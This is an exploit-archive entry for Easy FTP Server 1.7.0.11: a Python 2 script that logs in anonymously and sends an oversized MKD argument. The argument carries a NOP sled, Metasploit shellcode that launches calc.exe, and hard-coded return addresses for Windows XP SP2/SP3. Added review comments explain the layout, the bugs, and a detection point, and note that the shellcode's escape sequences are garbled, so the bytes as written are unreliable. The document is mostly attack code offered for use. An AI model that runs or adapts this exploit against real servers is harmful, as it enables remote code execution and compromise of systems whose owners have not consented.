
# Title : Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit (Post Auth)
# Published : 2010-07-17
# Author : Karn Ganeshen
# Previous Title : Easy FTP Server v1.7.0.11 LIST Command Remote Buffer Overflow Exploit (Post Auth)
# Next Title : Netscape Browser v9.0.0.6 Clickjacking Vulnerability


#!/usr/bin/python
import socket,sys

# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]

# Python 2 script (print statements, bare except clauses): it does not run
# under Python 3 as written.
# Flow: parse <host> <port>, connect, log in as 'anonymous', send one MKD
# command whose argument is the oversized string built below, then infer the
# outcome from whether the server still answers.
print """
#
****************************************************************************
#									   #
*  Easy FTP Server v1.7.0.11 [MKD] Remote BoF Exploit Post Authentication  *
*  Author / Discovered by : Karn Ganeshen 				   *
*  Date : July 5, 2010							   *
*  KarnGaneshen [aT] gmail [d0t] com     				   *
*  http://ipositivesecurity.blogspot.com				   *
#									   #
****************************************************************************
#
"""

# Exactly two positional arguments are expected: target host and TCP port.
if len(sys.argv) != 3:
    print "Usage: ./easyftp_mkd.py <Target IP> <Port>"
    sys.exit(1)
 
target = sys.argv[1]
port = int(sys.argv[2])  # unvalidated: a non-numeric port raises ValueError here

# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ]
# NOTE(review): the string literals below (and the 'rn' line endings further
# down) look extraction-garbled — the backslash of each escape sequence is
# missing, so as written each "xNN" is three literal ASCII characters and the
# lengths quoted in the comments no longer match the strings. Treat this
# listing as a description of the technique, not a faithful copy of the
# original file.

shellcode = ("xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1"
"x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5"
"xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69"
"xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2e"
"x8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8"
"x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08"
"xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8c"
"x61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0c"
"xd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80"
"x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6b"
"xe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84"
"xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14"
"x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4c"
"xabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0e"
"xd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8"
"x51x6bx28")

# Layout of the MKD argument: sled, then shellcode, then the saved return
# address. The return address is hard-coded per service-pack build, which is
# why the comment lists one value per tested XP build; the script is tied to
# those exact builds and has no way to pick one at run time.
nopsled = "x90" * 40
ret = "x10x3Bx880" # MAGIC RET 00883B10 (SP2) / 00893B58 (SP3) [ EBP points to nopsled when overflowed ]
payload = nopsled + shellcode + ret 

print "[+] Launching exploit against " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# No settimeout() is ever called on this socket, so every recv() below can
# block indefinitely.
try:
    connect=s.connect((target, port))  # socket.connect returns None; 'connect' is never read
    print "[+] Connected!"
except:
    # Bare except: the real cause (refused, unreachable, DNS failure, Ctrl-C)
    # is discarded, and the process exits with status 0 despite failing.
    print "[!] Connection failed!"
    sys.exit(0)
    
s.recv(1024)  # server greeting, read and discarded without checking the reply code

# Targeting default user 'anonymous' on the target.
# Each reply is read and thrown away, so a rejected login is not noticed
# here; it only surfaces later as an ordinary error reply to MKD.
s.send('USER anonymousrn')
s.recv(1024)
s.send('PASS anonymousrn')
s.recv(1024)

print "[+] Sending payload..."
# On the server side this is the distinctive event: an anonymous login
# followed by an MKD argument far longer than any real directory name. A
# protocol-aware IDS rule or a command-length limit in the FTP daemon would
# catch exactly this line.
s.send('MKD ' + payload + 'rn')

print "[!] Verifying if the user has 'Create Directory' permission. This may take some time..."

# Outcome heuristic, not a verification: if the server still answers, the
# script assumes it survived and blames a missing MKD privilege; if recv()
# raises for any reason (connection reset, network error, KeyboardInterrupt —
# the except is bare) it reports success. Because no timeout is set, a server
# that simply never replies makes this recv() hang rather than fall through.
try:
    s.recv(1024)    
    print "[!] Uhh.. User does not have MKD privilege. +++Exploit failed+++"

except:
    print "[+] +++Exploit Successful+++ ^_^"

s.close()